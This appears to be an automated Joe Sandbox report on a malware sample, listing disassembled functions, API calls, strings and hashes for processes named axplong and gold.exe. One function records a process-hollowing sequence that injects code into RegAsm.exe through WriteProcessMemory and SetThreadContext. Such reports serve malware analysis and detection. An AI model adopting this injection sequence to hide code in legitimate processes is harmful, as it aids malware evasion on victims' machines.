Associated: 0000000A.00000002.3790210564.00000000009B3000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3791789408.00000000009B4000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792519834.0000000000B45000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792597928.0000000000B47000.00000080.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b0000_axplong.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: `8n$csm
API String ID: 1170836740-3564798756
Opcode ID: b4a64db7a6da550aa31c59a54ae852bf506816b8155da49e1a963e77f5d9c77f
Instruction ID: d1905d04478de43a42dedfc03653ce5533c4e783847bddade1185a6c3b19c637
Opcode Fuzzy Hash: b4a64db7a6da550aa31c59a54ae852bf506816b8155da49e1a963e77f5d9c77f
Instruction Fuzzy Hash: F951C534A023C89BCF10DF7AC881AEE7BA7EF45314F148199E9159B352DB36DA05CB90

Function 006E70A9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 006E70EB

Strings

.exe, xrefs: 006E70F8
.cmd, xrefs: 006E7109
.bat, xrefs: 006E711A
.com, xrefs: 006E712B

Memory Dump Source

Source File: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true

Associated: 0000000A.00000002.3789210098.00000000006B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3789339171.0000000000712000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790159514.0000000000719000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000071B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000096F000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000099B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009A6000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009B3000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3791789408.00000000009B4000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792519834.0000000000B45000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792597928.0000000000B47000.00000080.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b0000_axplong.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 829662ef199ae60db5b91d977fa5dd7d180202baa366082b492ffbcb2619f484
Instruction ID: f37e2b923a5e8af36635043b238d592a888adb0fc92f4814647ab90979779016
Opcode Fuzzy Hash: 829662ef199ae60db5b91d977fa5dd7d180202baa366082b492ffbcb2619f484
Instruction Fuzzy Hash: 29016637B09395356614601B9C066F7578A8F92BB0B2E012EF904FB3C3EF58DC0242E4

Function 006B2DC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 006B2E5F
__Mtx_unlock.LIBCPMT ref: 006B2ECC
__Cnd_broadcast.LIBCPMT ref: 006B2EE3
__Mtx_unlock.LIBCPMT ref: 006B2FF5
__Mtx_unlock.LIBCPMT ref: 006B309B

Memory Dump Source

Source File: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true

Associated: 0000000A.00000002.3789210098.00000000006B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3789339171.0000000000712000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790159514.0000000000719000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000071B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000096F000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000099B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009A6000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009B3000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3791789408.00000000009B4000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792519834.0000000000B45000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792597928.0000000000B47000.00000080.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b0000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 6770502fc7df12164bbd3e60668b78d47fe5df1bb98e67a69a6245aabd22c345
Instruction ID: 3903aac548e9229cca4f3d42f93866afd16c1e79d656e93d9acaf4d503dfd38b
Opcode Fuzzy Hash: 6770502fc7df12164bbd3e60668b78d47fe5df1bb98e67a69a6245aabd22c345
Instruction Fuzzy Hash: 4FA1D2B0A006169FDB10EF65C945BEAB7FAEF05320F04826DE815D7741EB34EA41CB91

Function 006EC990 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 006ECA17

Memory Dump Source

Source File: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true

Associated: 0000000A.00000002.3789210098.00000000006B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3789339171.0000000000712000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790159514.0000000000719000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000071B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000096F000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000099B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009A6000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009B3000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3791789408.00000000009B4000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792519834.0000000000B45000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792597928.0000000000B47000.00000080.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b0000_axplong.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction ID: 7bba362351ee9f5bc054f1085901fb7df2623cb464b96bbf096e308601b4b911
Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction Fuzzy Hash: B4B1F7329023C59FDB15CF29C8817EEBBE6EF55360F2481A9E8459B341D6349D43CB54

Function 006CBA72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 006CBACA
__Xtime_diff_to_millis2.LIBCPMT ref: 006CBAE4
_xtime_get.LIBCPMT ref: 006CBB07
__Xtime_diff_to_millis2.LIBCPMT ref: 006CBB13

Memory Dump Source

Source File: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true

Associated: 0000000A.00000002.3789210098.00000000006B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3789339171.0000000000712000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790159514.0000000000719000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000071B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000096F000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000099B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009A6000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009B3000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3791789408.00000000009B4000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792519834.0000000000B45000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792597928.0000000000B47000.00000080.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b0000_axplong.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 61e0048251da287160f67f1d414e3762ffaeede2d0008cf753f2d56f0f3576d7
Instruction ID: 18b8886561015bf363f815f312acf9492ececb5619208178a9011f3927764b72
Opcode Fuzzy Hash: 61e0048251da287160f67f1d414e3762ffaeede2d0008cf753f2d56f0f3576d7
Instruction Fuzzy Hash: DD214C71A00109AFDF00EFA4DC86EBEB7BAEF49720F50405DF905A7291DB34AD019BA5

Function 006C7010 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 006C723C

Strings

pyl, xrefs: 006C70F3
0zl, xrefs: 006C7252

Memory Dump Source

Source File: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true

Associated: 0000000A.00000002.3789210098.00000000006B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3789339171.0000000000712000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790159514.0000000000719000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000071B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000096F000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000099B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009A6000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009B3000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3791789408.00000000009B4000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792519834.0000000000B45000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792597928.0000000000B47000.00000080.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b0000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: 0zl$pyl
API String ID: 3366076730-36466994
Opcode ID: 5ad6e0ad6738831b251d9d42c6d5c8c040717206b24d82c5d6df06e8a8be9e40
Instruction ID: 420306f777e3d1b3c376bf6eaa011b561dd19808f2873e38bd2c57744482c54e
Opcode Fuzzy Hash: 5ad6e0ad6738831b251d9d42c6d5c8c040717206b24d82c5d6df06e8a8be9e40
Instruction Fuzzy Hash: 3AA125B0A01615CFDB21CFA8C984BAABBF1EF58710F19815DE819AB351E7799D01CF90

Function 006EF1FF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 006EF243

Strings

8"q, xrefs: 006EF2EB
`'q, xrefs: 006EF215

Memory Dump Source

Source File: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true

Associated: 0000000A.00000002.3789210098.00000000006B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3789339171.0000000000712000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790159514.0000000000719000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000071B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000096F000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000099B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009A6000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009B3000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3791789408.00000000009B4000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792519834.0000000000B45000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792597928.0000000000B47000.00000080.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b0000_axplong.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"q$`'q
API String ID: 3903695350-309746063
Opcode ID: a3966773558979e4bf70742588cd5edde00b3c8b1d0345fb53f3c0d052d2b133
Instruction ID: 032d0e0f951ba7ae2e6f9ec8a22fcbd14744be097f5921a0682a1d582805e922
Opcode Fuzzy Hash: a3966773558979e4bf70742588cd5edde00b3c8b1d0345fb53f3c0d052d2b133
Instruction Fuzzy Hash: 0C3190716023849FEB61ABBADA05B9673EBAF00710F24442DE04ADB291DF71FD848B55

Analysis Process: gold.exePID: 7752, Parent PID: 8080COMMON

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	0.6%
Signature Coverage:	1.2%
Total number of Nodes:	1077
Total number of Limit Nodes:	5

Executed Functions

Function 023D018D Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,023D00FF,023D00EF), ref: 023D02FC
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 023D030F
Wow64GetThreadContext.KERNEL32(0000011C,00000000), ref: 023D032D
ReadProcessMemory.KERNELBASE(00000120,?,023D0143,00000004,00000000), ref: 023D0351
VirtualAllocEx.KERNELBASE(00000120,?,?,00003000,00000040), ref: 023D037C
WriteProcessMemory.KERNELBASE(00000120,00000000,?,?,00000000,?), ref: 023D03D4
WriteProcessMemory.KERNELBASE(00000120,00400000,?,?,00000000,?,00000028), ref: 023D041F
WriteProcessMemory.KERNELBASE(00000120,?,?,00000004,00000000), ref: 023D045D
Wow64SetThreadContext.KERNEL32(0000011C,023E0000), ref: 023D0499
ResumeThread.KERNELBASE(0000011C), ref: 023D04A8

Strings

WriteProcessMemory, xrefs: 023D02A0
aryA, xrefs: 023D01D3
GetP, xrefs: 023D020F
VirtualAlloc, xrefs: 023D0254
GetThreadContext, xrefs: 023D0267
VirtualAllocEx, xrefs: 023D028D
Load, xrefs: 023D01CB
CreateProcessA, xrefs: 023D0241
SetThreadContext, xrefs: 023D02B3
ReadProcessMemory, xrefs: 023D027A
ress, xrefs: 023D0217
ResumeThread, xrefs: 023D02C9
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 023D02FB
TerminateProcess, xrefs: 023D038B

Memory Dump Source

Source File: 0000000C.00000002.1954224353.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23d0000_gold.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction ID: 9588a2d27888b13beeee66306a72c3e74584604e5bce290186db90878b60aa9a
Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction Fuzzy Hash: 9BB1E57664028AAFDB60CF68CC80BDA77A5FF88714F158524EA0CAB341D774FA51CB94

Function 001725D0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OffsetRect.USER32(00000000,00000000,00000000), ref: 00172718
Polyline.GDI32(00000000,00000000,00000000), ref: 00172739

Strings

dsdsww, xrefs: 00172630
regwgrrwr, xrefs: 001726A3
size of vector, xrefs: 00172645

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: OffsetPolylineRect
String ID: dsdsww$regwgrrwr$size of vector
API String ID: 1418762327-435021585
Opcode ID: 0e6ccb67f0c3eecbb040d60ca84a0af2d2a4cf414554bbdaa0b82243547e26df
Instruction ID: 55eb2d8100ad08301b0835009a519fd8ebe3c0246dc33b1988a4a48f67de8d97
Opcode Fuzzy Hash: 0e6ccb67f0c3eecbb040d60ca84a0af2d2a4cf414554bbdaa0b82243547e26df
Instruction Fuzzy Hash: AB71E1712083409FD314EF28C855B6BBBE0BF94308F14496DF9E98B292C779D509CB52

Function 00172AB0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 122
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,00172C30,00000000,00000000,00000000), ref: 00172C1F
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00172C28

Strings

Own head, xrefs: 00172AF2
4, xrefs: 00172B5F
Earth, xrefs: 00172B12

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleThreadWait
String ID: 4$Earth$Own head
API String ID: 1891408510-3926490352
Opcode ID: d7e3af5c743c7f33913da8aba425876ff7b73dcb20db23d1bfa23cf13feb59f1
Instruction ID: a1d42a29c979143fb68e4e97a2b032a963334ace095337147027085e8e494fbc
Opcode Fuzzy Hash: d7e3af5c743c7f33913da8aba425876ff7b73dcb20db23d1bfa23cf13feb59f1
Instruction Fuzzy Hash: 10415531604340ABCB149F388C85B2FB7F1AF99705F648A48F8A89B182D374EB458752

Function 001644AB Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,0016B73A,?,00000000,?,?,0016B9DB,?,00000007,?,?,0016BED4,?,?), ref: 001644C1
GetLastError.KERNEL32(?,?,0016B73A,?,00000000,?,?,0016B9DB,?,00000007,?,?,0016BED4,?,?), ref: 001644CC

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 706098c3673193095630f76c894ca840ca7d99754c70cdcf7743f0d1d4bccdfd
Instruction ID: bc1edafef786b0ff31e104956ac46099bb4c4fb31b08af51e27e21d62c933dbf
Opcode Fuzzy Hash: 706098c3673193095630f76c894ca840ca7d99754c70cdcf7743f0d1d4bccdfd
Instruction Fuzzy Hash: 19E0EC32104714ABCB322FA5ED0AB9A7BA8EB55755F104060F60C9A970DB348AA0DB94

Function 00172C30 Relevance: 1.3, APIs: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040), ref: 00172CC0

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e03b43f06e1fa39de6149115cddba2ae8ec7ff2f17d876f647335c54ac921976
Instruction ID: e37c4aa75715a6427f5a8c396b48c91e5121e0f300861b19becd0ff87f2d5c1d
Opcode Fuzzy Hash: e03b43f06e1fa39de6149115cddba2ae8ec7ff2f17d876f647335c54ac921976
Instruction Fuzzy Hash: BE31E771E00208ABD700DF64CC85BEDB7B4BF29300F144259F918B7282DB74AA858765

Non-executed Functions

Function 0016CEE5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,0016D203,00000002,00000000,?,?,?,0016D203,?,00000000), ref: 0016CF7E
GetLocaleInfoW.KERNEL32(?,20001004,0016D203,00000002,00000000,?,?,?,0016D203,?,00000000), ref: 0016CFA7
GetACP.KERNEL32(?,?,0016D203,?,00000000), ref: 0016CFBC

Strings

OCP, xrefs: 0016CF39
ACP, xrefs: 0016CF03

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 60f2a8823cf95bc29a61d1aeb7ebd73ce95f44307e2688c0935b8bd604b7d369
Instruction ID: 2b28a314e4ff04069d3f496a4bf000fde1e3ffebde43a5669f082b80c04dcf4e
Opcode Fuzzy Hash: 60f2a8823cf95bc29a61d1aeb7ebd73ce95f44307e2688c0935b8bd604b7d369
Instruction Fuzzy Hash: 0B217C32704101AADB249B65CD05AB7B3A7EB54F60B5784A4F98AD7204EB32DE91D3D0

Function 0016D0BA Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001641C0: GetLastError.KERNEL32(?,00000008,001647BF), ref: 001641C4
Part of subcall function 001641C0: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 00164266

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0016D1C6
IsValidCodePage.KERNEL32(00000000), ref: 0016D20F
IsValidLocale.KERNEL32(?,00000001), ref: 0016D21E
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0016D266
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0016D285

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: fded8f7fbd8f0c43d066c20c8893b11ad829421f16937eddd12d1fb433ef54a7
Instruction ID: 40787a579f29ccfe7ed3bb0771a995b6b7f5287507b23f4f350150769a8166ae
Opcode Fuzzy Hash: fded8f7fbd8f0c43d066c20c8893b11ad829421f16937eddd12d1fb433ef54a7
Instruction Fuzzy Hash: 00517272E002099FEB10EFA5EC41ABE77B8FF1A700F554469E954E7190EBB0DA50CB61

Function 0016C756 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001641C0: GetLastError.KERNEL32(?,00000008,001647BF), ref: 001641C4
Part of subcall function 001641C0: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 00164266

GetACP.KERNEL32(?,?,?,?,?,?,00162857,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0016C817
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00162857,?,?,?,00000055,?,-00000050,?,?), ref: 0016C842
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0016C9A5

Strings

utf8, xrefs: 0016C914

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: 654de609f5860591c7257d2af503bdef3e9407b2f6fbcf492f300fe96480ae3f
Instruction ID: 66454b021a02dc12c7bbaa683dadcf4e07654f85d67b0de38ec8b31f822680a5
Opcode Fuzzy Hash: 654de609f5860591c7257d2af503bdef3e9407b2f6fbcf492f300fe96480ae3f
Instruction Fuzzy Hash: 4F710A72600302ABD724AB75CC46BBB73ACEF69704F14446AF599D7181EB70E960CBE0

Function 00159F26 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

